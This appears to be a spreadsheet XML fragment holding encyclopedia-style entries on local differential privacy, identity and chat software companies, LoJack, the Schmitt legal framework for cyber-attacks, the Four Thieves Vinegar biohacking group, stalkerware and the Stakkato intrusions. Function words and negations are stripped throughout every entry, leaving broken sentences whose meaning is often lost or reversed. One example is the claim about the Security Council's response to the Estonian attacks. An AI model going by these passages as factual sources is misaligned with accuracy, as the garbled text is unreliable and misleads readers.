identifying unexpected items events data sets, differ norm. prominence social networking current many hidden potential concerns, primarily related information privacy. users rely social networks, merely interactions self-representation, even going beyond store personal information, risks exposure become prominent. users often threatened privacy breaches, unauthorized access personal information, leakage sensitive data. attempt solve issue, authors "anomaly detection differential preserved privacy online social networks" proposed model using social network utilizing restricted local differential privacy. using model, aims improved privacy preservation anomaly detection analyzed. paper, authors propose privacy preserving model sanitizes collection user information social network utilizing restricted local differential privacy (ldp) save synthetic copies collected data. this model uses reconstructed data classify user activity detect abnormal network behavior. experimental results demonstrate proposed method achieves high data utility basis improved privacy preservation. furthermore, local differential privacy sanitized data suitable subsequent analyses anomaly detection. anomaly detection proposed method’s reconstructed data achieves detection accuracy similar original data. blockchain technology goal blockchain technology allow digital information recorded distributed, edited. introduction blockchain potential work local differential privacy received widespread attention decentralized, tamper-proof, transparent nature. blockchain works principle distributed, secured, shared ledger, used record, track data within decentralized network, successfully replaced certain systems economic transactions organizations potential overtake various industrial business models future. this growing concern different applications increasing exponentially, increased also raised questions regarding privacy security data stored this proposal implement differential privacy becomes option differential privacy allow blockchain model unique application scenarios improve privacy system blockchain. context-free privacy local differential privacy provides context-free privacy even absence trusted data collector. local differential privacy strong notion privacy individual users often comes expense significant drop utility. classical definition assumes elements data domain equally sensitive. however, many applications, symbols sensitive others. context-aware framework local differential privacy proposed researchers allows privacy designer incorporate application’s context privacy definition. binary data domains, research provides universally optimal privatization scheme highlight connections warner’s randomized response (rr) mangat’s improved response. motivated geolocation search applications, k-ary data domains, researchers consider special cases context-aware ldp: block-structured high-low (the latter also defined researchers study discrete distribution estimation provide communication-efficient, sample-optimal schemes information theoretic lower bounds models. end, show using contextual information require fewer samples classical achieve accuracy. facial recognition facial recognition become popular current stages society. date smartphones, example, utilize facial recognition unlock users phone well authorize payment credit card. though convenient users quick efficient, subtle doubts system place. this system resource-intensive task often involves third party users. this results user’s privacy compromised. biometric information delivered untrusted third party servers uncontrolled manner considered significant privacy leak biometrics correlated sensitive data healthcare financial records. chimikara's academic article, proposes privacy-preserving technique “controlled information release”, disguise original face image prevent leakage biometric features identifying person. introduces privacy-preserving face recognition protocol named peep (privacy using eigenface perturbation) utilizes local differential privacy. peep applies perturbation eigenfaces utilizing differential privacy stores perturbed data third-party servers standard eigenface recognition algorithm. result, trained model vulnerable privacy attacks membership inference model memorization attacks. this model provided chimikara shows potential solution issue privacy leaks. federated learning (fl) federated learning ambition protect data privacy distributed learning methods keep data storage. likewise, differential privacy (dp) attains improve protection data privacy measuring privacy loss communication among elements federated learning. prospective matching federated learning differential privacy challenges data privacy protection caused release several software tools support functionalities, lack unified vision techniques, methodological workflow supports usage. study sponsored andalusian research institute data science computational intelligence, developed sherpa.ai open-research unified framework aims foster research development services edges preserve data privacy. characteristics tested summarized study suggests make good candidates support services edges preserve data privacy finding setting value {\displaystyle \epsilon lower values would guarantee higher privacy cost lower accuracy. health data aggregation rise technology changes work perform everyday lives, also changes health industry also prominent result rise data emphasized. rapid growth health data scale, limited storage computation resources wireless body area sensor networks becoming barrier development health industry keep aiming solve this, outsourcing encrypted health data cloud appealing strategy. however, come potential downsides choices. data aggregation become difficult vulnerable data branches sensitive information patients healthcare industry. academic article, "privacy-enhanced multifunctional health data aggregation differential privacy guarantees," team proposes privacy enhanced multifunctional health data aggregation scheme (pmha-dp) differential privacy. this aggregation function designed protect aggregated data cloud servers. performance evaluation done study shows proposal leads less communication overhead existing data aggregation models currently place. internet connected vehicles idea internet one's would dream concept brought last century. however, updated vehicles contain feature convenience users. though convenient, poses another threat user's privacy. internet connected vehicles (iov) expected enable intelligent traffic management, intelligent dynamic information services, intelligent vehicle control, etc. however, vehicles’ data privacy argued major barrier toward application development iov, thus causing wide range attention. local differential privacy (ldp) relaxed version privacy standard, differential privacy, protect users’ data privacy untrusted third party worst adversarial setting. computational costs using concern among researchers quite expensive implement specific model given model needs high mobility short connection times. furthermore, number vehicles increases, frequent communication vehicles cloud server incurs unexpected amounts communication cost. avoid privacy threat reduce communication cost, researchers propose integrate federated learning local differential privacy (ldp) facilitate crowdsourcing applications achieve machine learning model. phone blacklisting topic spam phone calls increasingly relevant, though growing nuisance current digital world, researchers looking potential solutions minimizing issue. counter increasingly successful attack vector, federal agencies federal trade commission (ftc) working telephone carriers design systems blocking robocalls. furthermore, number commercial smartphone apps promise block spam phone calls created, come subtle cost. user’s privacy information comes giving access block spam calls leaked without user’s consent knowledge even occurring. study, researchers analyze challenges trade-offs related using local differential privacy, evaluate ldp-based system real-world user-reported call records collected ftc, show possible learn phone blacklist using reasonable overall privacy budget time preserve users’ privacy maintaining utility learned blacklist. trajectory cross-correlation constraint aiming solve problem data utilization privacy protection, personalized differential privacy protection method based cross-correlation constraints proposed researcher protecting sensitive location points trajectory sensitive points, extended differential privacy protection model combines sensitivity user’s trajectory location user privacy protection requirements privacy budget. using autocorrelation laplace transform, specific white noise transformed noise related user's real trajectory sequence time space. this noise data used find cross-correlation constraint mechanics trajectory sequence model. proposing model, researcher hu's personalized differential privacy protection method broken addresses issue adding independent uncorrelated noise degree scrambling results privacy protection poor data availability. ε-local differential privacy definition ε-local differential privacy positive real number {\displaystyle {\mathcal {a}}} randomized algorithm takes user's private data input. {\displaystyle {\textrm {im}}{\mathcal {a}}} denote image {\displaystyle {\mathcal {a}}} algorithm {\displaystyle {\mathcal {a}}} said provide {\displaystyle \epsilon -local differential privacy pairs user's possible private data {\displaystyle {\displaystyle x^{\prime subsets {\displaystyle {\displaystyle {\textrm {im}}{\mathcal {a}}} {\displaystyle \pr[{\mathcal {a}}(x)\in s]\leq e^{\epsilon }\times \pr[{\mathcal {a}}(x^{\prime })\in s],} probability taken randomness used algorithm. main difference definition standard definition differential privacy differential privacy probabilities outputs algorithm takes users' data algorithm takes single user's data. sometimes definition takes algorithm categorizes users data input, outputs collection responses (such definition raef bassily, kobbi nissim, stemmer abhradeep guha thakurta's 2017 paper deployment local differential privacy deployed several internet companies: references</t>
  </si>
  <si>
    <t>ForgeRock</t>
  </si>
  <si>
    <t>forgerock, inc. multinational identity access management software company headquartered francisco, u.s.a. offices bristol, london, grenoble, vancouver (usa), oslo, munich, paris, sydney, singapore. forgerock identity platform full-suite identity governance administration (iga) solution, implemented across organization identities (workforce, consumers things), offers feature parity across delivery options, including on-premise, cloud environment, multi-cloud, hybrid, service (saas). fran rosch forgerock. forgerock raised $250 million venture funding accel partners, foundation capital, meritech capital partners, riverwood capital kkr.the company 1,300 enterprise customers total, including bbc, bmw, geico, maersk, philips, standard chartered, toyota, weight watchers (ww), more.forgerock founded norway february 2010 group former microsystems employees, acquired oracle corporation. after acquisition, software scheduled phase-out favor oracle’s in-house product, founders "started company fork code continue developing sun’s software."in april 2020, forgerock announced raised $93.5 million funding, series continue expanding, "brings total raised company $230 million." company went public september 2021. it’s listed york stock exchange ticker symbol forg. products forgerock identity platform includes suite identity management, access management, intelligent access, identity gateway, directory services, identity governance, autonomous identity, edge security capabilities serve enterprise consumer, workforce, requirements. platform consumable cloud service forgerock identity cloud, deployable self-managed options, including public cloud, private cloud, on-premises environments. forgerock identity platform includes access management (based openam open source project), identity management (based openidm open source project), directory services (based opendj open source project), identity gateway (based openig open source project). forgerock access management provides access management, forgerock directory services ldap directory service, forgerock identity management used identity management, forgerock identity gateway provides identity gateway traffic application programming interfaces (apis). forgerock also offers profile privacy management dashboard compliance general data protection regulation (gdpr) provides support user-managed access (uma) standard.originally based open source software owned microsystems (now oracle corporation), enterprise version forgerock identity platform accessed purchasing commercial license. source code community version publicly available terms common development distribution license. references further reading "startup debuts cloud-based open-source identity access management software". computerworld. november 2012. retrieved august 2016. wolpe, toby (october 2013). "salesforce.com signs open source forgerock's identity tech". zdnet. retrieved august 2016. "forgerock ignites 'kantara' standard digital consent, privacy identity". forbes. august 2015. retrieved august 2016. reilly, richard byrne (june 2014). "forgerock takes million, promptly trash-talks oracle". venturebeat. retrieved august 2016. "industry collaboration will utilize digital patient identity consent advance clinical care". globenewswire. 2018. retrieved august 2018. "forgerock opens open banking". globenewswire. july 2018. retrieved august 2018. external links official website</t>
  </si>
  <si>
    <t>LoJack</t>
  </si>
  <si>
    <t>lojack stolen vehicle recovery connected system utilizes cellular technology locate users' vehicles, view trip history, battery levels, track speeding, maintain vehicle health native app. prior selling vehicle, lojack dealers system manage locate inventory, view manage battery health, recover stolen inventory. history original lojack system created patented 1979 william reagan, former medfield, massachusetts police commissioner, went establish lojack corporation medfield. reagan served company's first chairman. name "lojack" coined "antithesis hijack", wherein "hijack" refers theft vehicle force. 1998, company began offering tracking system heavy machinery construction industry, including entering agreement caterpillar.by 2013, lojack system reportedly operating states district columbia countries. company reported 1,800 u.s. enforcement agencies lojack tracking computers police vehicles. november 2013, company announced expanding tracking capabilities parents, auto makers insurance companies.in march 2016, company acquired $134 million calamp, irvine, california-based provider internet things (iot) software applications, cloud services, data intelligence telematics products services.in march 2021, vehicle intelligence company spireon announced acquired lojack u.s. stolen vehicle recovery business calamp, joining lojack users "nearly million active subscribers 20,000 current spireon customers". calamp would still retain continue expand lojack international, operates subscription-based saas business, also retaining ownership lojack patents trademarks. under spireon, lojack technology moved rf-based location cellular-based technology, growing availability solution throughout u.s. hawaii expanding solution stolen vehicle recovery connected technology dealers consumers. functionality core lojack system small hardware device collects feeds data back vehicle owner native connected app. user's vehicle stolen, helps user quickly contact corresponding police department delivers concierge-level recovery service. addition, lojack's psap integration long history partnership enforcement nationwide allows solution quick responsiveness recovery times. also carjacking comparison device tracking software connected lojack laptops motor vehicle theft radio direction finder vehicle tracking system references</t>
  </si>
  <si>
    <t>Schmitt Analysis</t>
  </si>
  <si>
    <t>schmitt analysis legal framework developed 1999 michael schmitt, leading author tallinn manual, deciding state's involvement cyber-attack constitutes force. such framework important part international law's adaptation process growing threat cyber-warfare. characteristics cyber-attack determine legal regime govern state behavior, schmitt analysis commonly used ways analyzing characteristics. also used basis training professionals legal field deal cyberwarfare. motivations society becomes dependent computers critical infrastructure, countries become increasingly concerned threats cyberspace. prevalence computers pace technological innovation advanced civilization significantly left many vulnerabilities exploited. countries must prepared defend know respond accordingly computer network attacks (cnas). these unique attacks different many ways physical uses force happen traditional warfare. attackers remotely disable targets simply transmission data. cnas also broad definition, every enacted state upon another sufficient reason states escalate armed engagement. depending treated force not, offending party would judged based either ihrl. bellum body defines reasonable sovereign states resort force defend resources, people interests. article charter defines situation sovereign state might employ force, states that: "nothing present charter shall impair inherent right individual collective self-defense armed attack occurs member united nations, security council taken measures necessary maintain international peace security. measures taken members exercise right self-defense shall immediately reported security council shall affect authority responsibility security council present charter take time action deems necessary order maintain restore international peace security." state autonomy self-defense, needs proof imminent threat. also needs according criteria proportionality necessity. schmitt analysis framework evaluating cna, according seven parameters, determine constitutes wrongful force, governments decide valid course action attacked. historical background estonian cyber-attacks 2007, targeting estonia's internet resources, appear first cyber attacks used weapon political conflict. estonia tension citizens wanted country independent russian-estonians. because attacks came russian addresses, russian government accused endorsing attacks. security council react estonian cyber-attacks. afterwards, threat cyber-war states seemed much real imminent. this event also highlighted importance international cooperation protection cyberspace. also brings light necessity international legislation regarding qualifies appropriate government response cnas.during 2008 conflict georgian nationalists south ossetian separatists, many georgian websites subject defacement ddos attacks. during conflict website named stopgeorgia.ru links potential targets attacks, along malicious software. russian civilians could participate cyber-attacks, question direct participation implies considered civilians anymore. 2010 stuxnet worm infected natanz uranium enrichment facilities iran suspected destroyed 1000 centrifuges discovered, setting back iran's nuclear program several years. russian company kaspersky said virus could deployed nation-state support, would lead creation kind arms race world. considering damage caused, along invasiveness, lack clear legitimacy speculation worm developed deployed help u.s. government possible israeli german assistance means stuxnet could seen force. though might seen unlawful force since iran nuclear activities targeted illegal. reason virus called cyber-weapon, although iranian government claim victim cyber-attack. iranian government's inaction might implications development legal norms regarding cyberspace, state's inaction addressed schmitt framework. force schmitt's analysis strongly tied article 2(4) charter, states that: "all members shall refrain international relations threat force territorial integrity political independence state, manner inconsistent purposes united nations." every force falls within scope article 2(4), threaten international peace. article specify armed force, question read kind force, even economic force violative economic coercion. idea force authorized within charter wrongful. practice though, necessary degree flexibility. there situations, decolonization humanitarian intervention, strict following rule might aligned community interests. regarding force needs adapt evolve situations circumstances, cyber-warfare. would difficult classify every force, considering example might even cause direct physical damage. make established dealt armed forces, schmitt proposed comparing characteristics consequences cnas. this goal case-by-case approach properly classify cnas fall category force not. nuclear warfare analogy computer network attacks are, like weapons mass destructions, asymmetric nature. since infrastructure power grids, transportation, telecommunications interlinked, attack site might catastrophic domino effect. destructive capabilities cyber-attacks compared effects nuclear radiation effect nuclear blasts. small countries wanting impact take advantage cheap launch cna. nuclear weapons also outlawed, along weapons warfare, need careful using threatening weapons follow rules proportionality, necessity, humanity. both nuclear weapons information weapons distinguish civilians non-civilians. analysis criteria seven criteria used evaluate computer network attack. analysis focuses predominantly criteria dependent consequences (and cyber attack considered cyber attack injury, death objects functionality), useful analyzing events happened planned. this utilitarian focus also predominant bello, strives humanity still allowing cases trade-off military gains civilian casualties, example. schmitt analysis also subjective, depends heavily context. measurements boundaries cnas become uses force, instead tries compare characteristics particular characteristics traditional uses force. severity: this level destruction caused attack. scope, duration intensity attack taken consideration. defacing public figure's website might considered force, disabling online banking system shutting nuclear plant's safety mechanisms might immediacy: speed harm done, immediate attack leaves less room dialogue negotiation attacker target. state self-defense, irrefutable proof threat nation immediate. directness: might unexpected consequences, difficult predict complete impact cyber-attack. this clear consequences fact consequences events. invasiveness: cnas normally less invasive movement troops state's territory. cyber-attack affects sovereignty state, likely considered force. measurability: this clear exact consequences terms much damage done. armed coercion, consequences tend clear. presumptive legitimacy: state might employ method defensive counter-attack. self-defense exceptions prohibition application violence. state might also employ cnas resemble armed coercion. responsibility: usdod argues attack state state sponsored state state right invade state nation, instead intervene stop attack. since attackers route data remote locations, difficult attribute certainty accused state, happened estonia 2007.a relevant factor performing schmitt analysis perpetrators attack attempted accordance armed conflict (loac). this might case stuxnet, designed minimize collateral damage, spread beyond intended target accidentally. this attempted imply state involvement attack, since private individuals might concerned international law. also means attack likely characterized force, even cause actual damage. potential shortcomings main issue using schmitt framework requires attribution, attacking nation must held responsible attack. this seem happen cases, states carry actions within cyberspace secretive fashion claim responsibility. there also possibility state attacked take action offenders, accuse another state unlawful action. some also criticize framework's adherence article 2(4)'s instrument-based paradigm restrictive definition unlawful force, favor consequence-based framework. also cyberwarfare force international charter international humanitarian international human rights 2007 cyberattacks estonia stuxnet computer virus references</t>
  </si>
  <si>
    <t>Fortify Software</t>
  </si>
  <si>
    <t>fortify software, later known fortify inc., california-based software security vendor, founded 2003 acquired hewlett-packard 2010 become part enterprise security products. since 2017, fortify's products owned micro focus. fortify offerings included static application security testing dynamic application security testing products, well products services support software security assurance. february 2011, fortify sells fortify ondemand, static dynamic application testing service. history fortify software acquired 2010 running independent company since 2003.on september 2016, whitman announced software assets hewlett packard enterprise, including fortify, would merged micro focus create independent company enterprise shareholders would retain majority ownership.micro focus kevin loosemore called transaction "entirely consistent established acquisition strategy focus efficient management mature infrastructure products" indicated micro focus intended "bring core earnings margin mature assets deal percent total percent today micro focus's existing percent level within three years." merge concluded september 2017. technical advisory board fortify's technical advisory board composed rubin, bill joy, david wagner, fred schneider, gary mcgraw, greg morrisett, gong, marcus ranum, matt bishop, william pugh, john viega. security research fortify created security research group maintained java open review project vulncat taxonomy security vulnerabilities addition security rules fortify's analysis software. members group wrote book secure coding static analysis, published research, including javascript hijacking, attacking build: cross build injection, watch write: preventing cross-site scripting observing program output, dynamic taint propagation: finding vulnerabilities without attacking. also list tools static code analysis references external links official website gartner 2018 magic quadrant application security testing joy, bill (september 2006). "software isn't complete unless it's secure". businessweek. retrieved december 2018.</t>
  </si>
  <si>
    <t>LivePerson</t>
  </si>
  <si>
    <t>liveperson global technology company develops conversational commerce software.headquartered york city, liveperson best known developer conversational cloud, software platform allows consumers message brands. 2018, company announced offering, allowing customers create ai-powered chatbots answer consumer messages, alongside human customer service staff. history liveperson founded 1995 robert locascio. april 2000, company completed initial public offering nasdaq, march 2011 shares started trading also aviv stock exchange included ta-100 index bluetech index.since founding, liveperson expanded include offices israel, australia, germany, netherlands, italy, france japan. since closed offices favor remote working. liveperson provides based engagement service, also referred click chat. acquisitions products services conversational cloud cloud-based method customer messaging. business communicate customers web, mobile, social. insights turns customers' chat transcripts structured unstructured data provide actionable insights. also tech companies york metropolitan area references external links official website</t>
  </si>
  <si>
    <t>LiveChat</t>
  </si>
  <si>
    <t>livechat online customer service software online chat, help desk software, analytics capabilities. first launched 2002 currently developed offered saas (software service) business model livechat software s.a. companies livechat single point contact manage software customer service online sales activities normally provided using different channels (chat, email social media) multiple tools. technology technically, livechat proprietary software built multiple technologies, including javascript, node.js, mysql, elasticsearch, erlang. entire platform consists main elements: website chat widget embedded customer's website seen users (website visitors) small chat box, traditionally displayed bottom right corner browser. chat widget visible desktop mobile devices, either browser part mobile application. agent application used company employees respond questions asked customers. usually agents web-based application, allows employees conduct chat website visitor using browser. however, desktop applications available windows mobile apps android ios. blackberry windows phone mobile apps used exist past, longer developed. agent application enhanced user interface tools make one-to-many communication quicker efficient. examples tools include: canned responses, keyboard shortcuts, typing indicator customer message sneak-peek, geolocation, tags system categorization, etc.there ways online chat session agent website visitor: passive communication, started website visitor clicks chat button widget displayed page. active communication, initiated manually agent automatically livechat system soon visitor meets predefined criteria (i.e. searched keyword, time website, encountered error, etc.). once criteria met, livechat displays chat invitation customized message. during chat session, agents close sales, results increasing overall conversion rate.in areas unrelated directly product, livechat relies party services. this includes postmark delivery transactional emails, recurly subscription billing, pingdom performance monitoring uptime tracking upscope instant screen sharing customers. features apart website chat, core features include: real-time website traffic monitoring, built-in ticketing system agents' efficiency analytics. system identifies best prospects visiting website based data gathered purchasing decisions million buyers. statistics section allows calculating conversion chat invitations chat sessions sales.livechat available languages: armenian, azeri, bulgarian, catalan, simplified chinese, traditional chinese, croatian, czech, danish, dutch, english, estonian, finnish, french, german, greek, hungarian, icelandic, indonesian, italian, japanese, korean, latvian, lithuanian, norwegian (bokmål), norwegian (nynorsk), polish, portuguese, brazilian portuguese, romanian, russian, serbian, slovak, slovene, spanish, swedish, thai, turkish, ukrainian, vietnamese, tamil. customer service platform first available closed solution, livechat turned time open scalable customer service platform. created ecosystem applications, companies services supporting business communication tools documentation multiple points integration within application communication protocol, community connecting users party developers, partners experts, partner program service monetization, marketplace distribution applications experts' services. criticism among generally positive reviews, comments emphasize high cost product, especially compared cheap free solutions available market. lack freemium version expensive pricing mentioned customers also admit "range features services" justify price.critical reviews claim "bigger businesses find price minimal considering benefit product brings, start-ups smaller businesses, livechat financial reach". research since 2014 livechat publishing customer service report annual study customer satisfaction analysis online business communication trends. includes research thousands companies millions customer service email live support interactions. also livechat software references https://www.click2magic.com/==external links== official website</t>
  </si>
  <si>
    <t>Foundation for the Economics of Sustainability</t>
  </si>
  <si>
    <t>feasta, foundation economics sustainability organisation based ireland aims identify characteristics (economic, cultural environmental) truly sustainable society, articulate necessary transition effected promote implementation measures required purpose". founded dublin, ireland 1998. history name "feasta" irish word means future". feasta founded result week-long workshop given economist richard douthwaite county kerry, ireland, course attendants decided establish organisation promote sustainability ireland elsewhere, emphasis role played systems world economy. founders feasta included retired barrister john jopling, co-author gaian democracies, architect emer o'siochru, events organiser davie philip. philosophy feasta sees promoting coming, necessary, transition sustainable economic systems, including sustainable financial system, transport system food production system. organisation uses tagline "designing systems sustainable future". social justice assumed important component sustainability. activities since inception, feasta's attitude sustainability needs explored promoted public general policy-makers particular. simultaneously taken "bottom-up" "top-down" approach activities. bottom-up feasta registered educational non-profit, membership open all. according website, feasta tries operate democratic non-hierarchical possible. activities generally initiated individual members interested pursuing specific projects. they often willing start working projects little funding, using feasta support make contact interested people, funding coming later. feasta employs members' agent, morag friel, whose help members touch another, identify common interests develop projects. feasta website interactive, forum section includes discussions broad topics energy, food land, well ongoing projects share. members also touch another website. relevant papers articles uploaded forum members. feasta hosted large number sustainability-related events open public. organised several major conferences, covering subjects ireland's transition renewable energy, merits introducing land value tax, third-world debt climate change, challenge sustainable food production world depleting fossil fuel. since founding held annual lecture year dublin. past lecturers included herman daly, david korten, marjorie kelly wolfgang sachs. feasta also hosted numerous workshops, courses discussions. frequently collaborated events organisations london-based economics foundation, jubilee research, cultivate centre dublin, sustainable energy authority ireland, trocaire cori (the conference religious ireland).top-down since 1999, feasta made series submissions reports governmental bodies ireland topics ranging financial system reform rural housing. series seminars entitled "converging crises: policy responses" summer 2008 also aimed policymakers, although general public welcome attend.feasta received funding irish environmental protection agency number projects, ongoing ones late 2008) consisting research carbon sinks cycles "smart taxes". irish government currently considering adoption share, approach addressing climate change developed feasta, reduce greenhouse emissions transport. publications sharing survival: restoring climate, commons society (2012) website fleeing vesuvius (2010) website share: fair greenhouse emissions (2008) living cracks: look rural social enterprises britain czech republic (2005) feasta review growth, celtic cancer (2004) before wells dry: ireland's transition renewable energy (2003) feasta review (2001)since 2005, feasta expanded multimedia production. videos feasta lectures many feasta events available free download website. share feasta proposed share carbon market mechanism reducing emissions large chunk economy -road transport subject emissions trading scheme. under share, emission permits cover fossil fuel usage would issued free equally consumers, limited overall would reduce time. consumers would sell permits companies, would required purchase permits cover emissions associated fuels sold. smart network september 2008, feasta awarded multi-annual funding irish department environment project carbon cycles sinks project (see below). smart network research, design, develop adapt fiscal market-based mechanisms increase environmental, social economic sustainability ireland. mechanisms network concerns will, amongst things, designed address climate change, develop national local resilience, foster biological, cultural economic diversity, foster justice equality. primary role network research devise tools policymakers engage policy making process. particular, contribute liaise commission taxation. carbon cycles sinks purpose carbon cycles sinks project develop policies enable irish land mass become carbon sink rather source greenhouse emissions. this project richard douthwaite, corinna byrne project coordinator lead researcher. core areas examined ccsn include: best management practices technologies reduce eliminate release greenhouse emissions damaged peat bogs. best management practices increase carbon content forests, hedgerows, scrub, arable pasture land. best management practices technologies reduce nitrous oxide emissions fertilizer development policies substantially reduce nitrous oxides gases tillage land reward farmers using practises. study greenhouse emissions slurry storage ways reducing adopting technologies anaerobic digestion capture methane energy organic fertilizer. best ways measuring soil carbon, establishing baseline later comparison various agricultural practices additions amendments compost, biochar and/or microbial inoculations. liquidity network richard douthwaite others volunteering project unfunded august 2009. liquidity network address irish national liquidity problem slow economic activity triggered credit crunch. currently virtually economic activity powered debt based credit individuals businesses borrow order finance activities. using credit released loans employ business individuals/ businesses turn business suppliers there thus multiplier effect whereby initial credit fuels transactions worth many times value initial loan. when ’seed’ credit banks dries current crisis, multiplier effect normally helps create liquidity efficiently acts reverse removes liquidity quickly. feasta’s liquidity network aims address problem creating alternative ‘liquidity stream’ based debt. feasta liquidity network group hoping launch world's first debt-free electronic currency county kilkenny early 2010. also schumacher center economics carbon finance references external links feasta homepage</t>
  </si>
  <si>
    <t>Little Snitch</t>
  </si>
  <si>
    <t>little snitch host-based application firewall macos. used monitor applications, preventing permitting connect attached networks advanced rules. produced maintained austrian firm objective development software gmbh. unlike stateful firewall, designed primarily protect system external attacks restricting inbound traffic, little snitch designed protect privacy limiting outbound traffic. little snitch controls network traffic registering kernel extensions standard application programming interface (api) provided apple.if application process attempts establish network connection, little snitch prevents connection, rule connection user. that, dialog presented user, allows deny permit connection one-time, time limited, permanent basis. dialog also allows user restrict parameters connection, restricting specific port, protocol, domain. little snitch's integral network monitor shows ongoing traffic real time domain names traffic direction displayed. application (version received positive 4.5/5 review macworld. references external links official website</t>
  </si>
  <si>
    <t>Standard Electric Time Company</t>
  </si>
  <si>
    <t>standard electric time company springfield, massachusetts company founded 1884, manufacturer synchronized clock systems fire alarm systems. they oldest manufacturer electric clocks united states. company acquired johnson controls 1970 faraday 1978. history company founded waterbury, connecticut charles warner, pioneer electric clock. company later moved springfield 1911. standard quickly became known electric clock systems, often installed schools, universities, public buildings. these systems consisted master clock, controlled secondary clocks. like many companies great depression, standard suffered financial difficulties throughout 1930s. 1940s world standard products used many defense projects. 1950, standard made 15,000-square-foot (1,400 addition onto springfield plant, introduced several product lines, notably fire alarm systems, fluid analyzer systems, nurse call systems hospitals. 1970, announced company would sold johnson controls milwaukee, wisconsin. during period, company modernized fire alarm division set/7000, modular solid-state conventional panel, later set/7500, 250-zone multiplex panel console form could control fire alarm, security, building automation systems, along light plates remote lights. 1978, johnson controls sold standard electric time faraday. 1981, faraday downsized company substantially, closing divisions except standard electric time, moved tecumseh, michigan. faraday owned siemens, small branch office still remains springfield. external links standard electric time collectors' photo gallery setclocks: site dedicated standard electric time company</t>
  </si>
  <si>
    <t>Four Thieves Vinegar Collective</t>
  </si>
  <si>
    <t>four thieves vinegar collective anarchist biohacking group founded 2015 michael laufer. they published instructions "epipencil", epinephrine autoinjector, "apothecary microlab", do-it-yourself (diy) device intended make variety medications, notably pyrimethamine (daraprim). they criticized medical community causing potential harm patients instructions, laufer claims defend people's right attempt medical treatment. members four thieves' membership generally composed technically-trained people, include medical professionals. views laufer compared work women waves, group provides abortion medication women areas abortion illegal. motivation founding group provide medication people expensive afford, illegal acquire, unavailable treating orphan disease. believes providing lifesaving medication need justifies violating intellectual property rights pharmaceutical companies, supports cognitive liberty. history laufer, trained mathematics, decided form group 2008 graduate school trip salvador. while visiting local medical clinic learned despite existence many clandestine chemistry labs producing methamphetamine mdma, clinic oral contraceptives. investigated possibility pharmaceuticals culminated founding four thieves 2015. took name four thieves vinegar, legendary plague cure.four thieves formerly partnered chematica develop recipes group's medication, ended lost access information software given pharmaceutical company merck bought startup. epipencil 2016, price epipen raised $318 manufacturer mylan, four thieves released instructions build "epipencil", homemade epinephrine autoinjector built $30. made three off-the-shelf parts. criticized potential danger. theresa eisenman, spokeswoman united states food drug administration, stated using device "potentially dangerous practice". device known actually used. apothecary microlab four thieves released instructions building "apothecary microlab", device claimed able synthesize variety medications. group released instructions manufacturing pyrimethamine (daraprim) acetonitrile, ethyl bromide, dicyandiamide laufer claims also used make naloxone, cabotegravir, mifepristone, misoprostol. jeremiah johnson, researcher massachusetts institute technology, stated using would dangerous could create wrong drug wrong dose. eric hippel, economist supports medication, stated design could create chemical byproducts well instead intended medication.laufer claims successfully synthesized cabotegravir, experimental integrase inhibitor, asked heroin dealers product order help lower rates infection among heroin users. abortion 2022, four thieves released detailed instructions make abortion pill, subsequently distributed business cards hacker convention queens, york labeled "this card abortion" three doses misoprostol embedded them. reception jose gomez-marquez, researching pharmaceuticals mit, stated belief group publicity medication, concerned danger unvetted information published. vinay prasad, professor medicine oregon health science university, believes medication "foolhardy".josiah zayner, another biohacker, believes group's work symbolic anything else.chemist derek lowe described vice magazine article collective "largely bullshit". noted synthesized known substances rather producing ones. also pointed proposal combat hepatitis could accidentally cause treatment-resistant strains hepatitis legal status patricia zettler, former attorney fda, believes four thieves' work legal providing information rather drugs themselves. also crispr direct action martin shkreli references external links official website</t>
  </si>
  <si>
    <t>Stalkerware</t>
  </si>
  <si>
    <t>stalkerware monitoring software spyware used cyberstalking. term coined people started widely commercial spyware spouses intimate partners. stalkerware criticized abusers, stalkers, employers. definition uses many information security experts journalists apply term stalkerware software (malicious programs legitimate commercial monitoring products) used potentially used stalking. following features stalkerware distinguished: powerful surveillance functions (key logging, making screenshots, monitoring internet activity, recording location, recording video audio); ability work stealth mode (the user notified monitored); application visible list installed programs; running application disguised system processes utility programs); correct installation and/or operation application requires disabling anti-viruses built-in protection case mobile applications, usually installed resources official stores, although cases stalkerware stores; software manufacturer positions product means tracking intimate partner tool parental monitoring, while, fact, anybody access another person's phone, determine location, read private messages, cameras hear microphones. history according 2014 survey npr, domestic abuse shelters surveyed reported working individuals tracked abusers stalkerware. rising popularity stalkerware arms race apps helped users protect privacy, apps designed circumvent safeguards.throughout history, companies develop stalkerware subject numerous hacks data breaches, many hacktivists protest stalkerware's unethical applications. companies including mspy, flexispy, kidguard targets breaches.in 2018, computer security specialist activist galperin created project eradicate stalkerware. galperin advocated stalkerware seen malware, phone software companies take steps safeguard programs.in 2020, kaspersky released report state stalkerware. among findings united states, russia brazil three countries affected. reception stalkerware criticized abusers control monitor victims. european institute gender equality released report stalkerware cyberstalking's connection domestic violence. guides detect disable stalkerware published sites including mashable, wired, cnet.the news organization vice publishes "when spies come home", investigative series stalkerware, various controversies surrounding industry. legality also pegasus (spyware) cyberstalking references</t>
  </si>
  <si>
    <t>Stakkato</t>
  </si>
  <si>
    <t>stakkato alias swede philip gabriel pettersson, alleged perpetrator worldwide cyber attack known occurred least december 2003 2005, targeting many sites internet including military, white sands missile range, nasa, number academic institutions (known include caltech, stanford university, diego supercomputer center, uiuc), number non-us academic institutions (known include uppsala university sweden university college cork ireland) several internet locations. using locally based kernel exploits sophisticated technique requires high knowledge level advanced development skills), stakkato managed elevate user privileges gain control various systems within numerous government agencies private sector enterprises. stolen login credentials stakkato able gain access systems well years. finally, stakkato able gain access cisco corporation's router internetwork operating system (ios) source code, enabled attacker develop custom exploits, rootkits (backdoors), enhanced control routers around world. philip gabriel pettersson uppsala, sweden, years old, questioned attack march 2005, possible accomplices searched sweden, britain, elsewhere europe. pettersson indicted five felonies 2009, february 2010 prosecution transferred swedish authorities. also byzantine foothold moonlight maze solar sunrise titan rain references external links bodmer, kilger, carpenter, jones (2012). reverse deception: organized cyber threat counter-exploitation. york: mcgraw-hill osborne media. isbn 0071772499, isbn 978-0071772495 swede indicted nasa-cisco hacks hacker infiltrated government computers, cnn, 2005 stakkato intrusions what happened learned?, technical presentation ccgrid06, 2006 tempting fate, singer, ;login: february 2005. description attacks response sdsc. swedish notice concerning possible prosecution stakkato, doj, february 2010</t>
  </si>
  <si>
    <t>List of web analytics software</t>
  </si>
  <si>
